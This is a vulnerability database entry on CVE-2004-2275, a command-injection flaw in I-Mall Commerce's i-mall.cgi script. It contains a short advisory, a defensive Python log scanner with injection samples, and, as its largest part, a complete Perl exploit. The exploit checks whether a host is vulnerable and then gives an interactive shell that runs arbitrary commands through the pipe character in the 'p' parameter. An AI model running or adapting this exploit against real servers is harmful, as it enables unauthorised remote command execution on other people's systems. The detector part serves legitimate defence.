I-Mall Commerce I-mall Script Remote Command Execution Vulnerability

Vulnerability ID: 1108749    Vulnerability type: Input validation
Published: 2005-05-04    Updated: 2005-10-20
CVE ID: CVE-2004-2275
CNNVD-ID: CNNVD-200412-1068
Platform: CGI    CVSS score: 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/980
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1068
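|Vulnerability details
I-Mall Commerce is a CGI-based online shopping system. The i-mall.cgi script included with I-Mall Commerce does not sufficiently filter user-supplied input, so a remote attacker can exploit this vulnerability to execute arbitrary commands on the system with the privileges of the web process. i-mall.cgi does not filter the value submitted in the "p" parameter; submitting a "|" pipe character followed by arbitrary shell commands causes those commands to be executed with the privileges of the web process.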
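
A defender-side check for the pattern described above, as an added example that is not part of the original advisory or the exploit: it scans web server access-log lines for i-mall.cgi requests whose "p" value decodes to shell metacharacters, including percent-encoded and double-encoded pipes. The combined log format is an assumption, and the log lines, IP addresses and the benign value "catalog" are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Characters a page name never needs; the advisory's case is the pipe "|".
SHELL_META = re.compile(r"[|;&`$<>\r\n]")
# Request field of an access-log line in combined log format (assumed).
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/May/2005:10:00:01 +0000] "GET /i-mall/i-mall.cgi?p=catalog HTTP/1.1" 200 5120',
    '198.51.100.7 - - [04/May/2005:10:00:02 +0000] "GET /i-mall/i-mall.cgi?p=|dir| HTTP/1.1" 200 812',
    '198.51.100.7 - - [04/May/2005:10:00:03 +0000] "GET /i-mall/i-mall.cgi?p=%7Cdir%7C HTTP/1.1" 200 812',
    '198.51.100.7 - - [04/May/2005:10:00:04 +0000] "GET /i-mall/i-mall.cgi?p=%257Cdir%257C HTTP/1.1" 200 0',
    '192.0.2.10 - - [04/May/2005:10:00:05 +0000] "GET /index.html?p=a|b HTTP/1.1" 200 100',
]

def suspicious_p_values(log_line):
    """Return decoded "p" values of an i-mall.cgi request that hold shell metacharacters."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/i-mall.cgi"):
        return []  # this check is scoped to the script named in the advisory
    hits = []
    for value in parse_qs(url.query, keep_blank_values=True).get("p", []):
        # parse_qs decodes once; decode a second time to catch %257C-style input.
        for candidate in (value, unquote_plus(value)):
            if SHELL_META.search(candidate):
                hits.append(candidate)
                break
    return hits

def scan(lines):
    """Yield (client_ip, decoded_value) for every flagged request."""
    for line in lines:
        for value in suspicious_p_values(line):
            yield line.split(" ", 1)[0], value

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent p={value!r} to i-mall.cgi")
```
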
|Exploit
##############################################
# I-Mall explo
# Spawn bash style Shell with webserver uid
# Greetz z, spax, foxtwo, Zone-H
# This Script is currently under development
##############################################

use strict;
use IO::Socket;
my $host;		
my $port;		
my $command;		
my $url;	
my $shiz;		
my @results;		
my $probe;		
my @U;			
$U[1] = "/i-mall/i-mall.cgi?p=|";
&intro;
&scan;
&choose;
&command;
&exit; 
sub intro {
&help;
&host;
&server;
sleep 1;
};
sub host {
print "\nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
$shiz = "|";
print "\nPort (enter to accept 80): ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};	
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
	$output = $results[$X];
	if (defined $output){
	if ($output =~/apache/){ $webserver = "apache" };
	};
};
if ($webserver ne "apache"){
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\nOK";
	};		
};  
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) { 
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
			      $status = "vulnerable";
			      };
	};
if ($flag eq "0") { 
}else{
     };
};
if ($status eq "not_vulnerable"){

				};
}; 
sub choose {

my $choice="1";
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
}; 
sub other {
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};  
sub command {
while ($command !~/quit/i) {
print "[$host]$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose }; 
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g; 
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};  
sub connect {
my $connection = IO::Socket::INET->new (
				Proto => "tcp",
				PeerAddr => "$host",
				PeerPort => "$port",
				) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command$shiz HTTP/1.1\r\nHost: $host\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";
};

while ( <$connection> ) { 
			@results = <$connection>;
			 };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};  
sub output{
my $display;
if ($probe eq "string") {
			my $X;
			for ($X=0; $X<=10; $X++) {
			$display = $results[$X];
			if (defined $display){print "$display";};
				};
			}else{
			foreach $display (@results){
			    print "$display";
				};
                          };
};  
sub exit{
print "\n\n\n ORP";
exit;
};
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n
        I-Mall E-Commerce Software i-mall.cgi 
        Command Execution Vulnerability by SPABAM 2004" ;
print "\n http://www.zone-h.org/advisories/read/id=4904
";
print "\n I-Mall Exploit v0.99beta18";
print "\n \n note.. web directory is normally /var/www/html";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n Command: SCAN URL HELP QUIT";
print "\n\n\n\n\n\n\n\n\n\n\n";
};

# milw0rm.com [2005-05-04]
|References

Source: XF
Name: imall-commerce-command-execution(16540)
Link: http://xforce.iss.net/xforce/xfdb/16540
Source: www.zone-h.org
Link: http://www.zone-h.org/advisories/read/id=4904
Source: BID
Name: 10626
Link: http://www.securityfocus.com/bid/10626
Source: www.securiteam.com
Link: http://www.securiteam.com/exploits/5UP0715FPC.html
Source: OSVDB
Name: 7461
Link: http://www.osvdb.org/7461
Source: SECUNIA
Name: 11972
Link: http://secunia.com/advisories/11972
Source: NSFOCUS
Name: 6658
Link: http://www.nsfocus.net/vulndb/6658
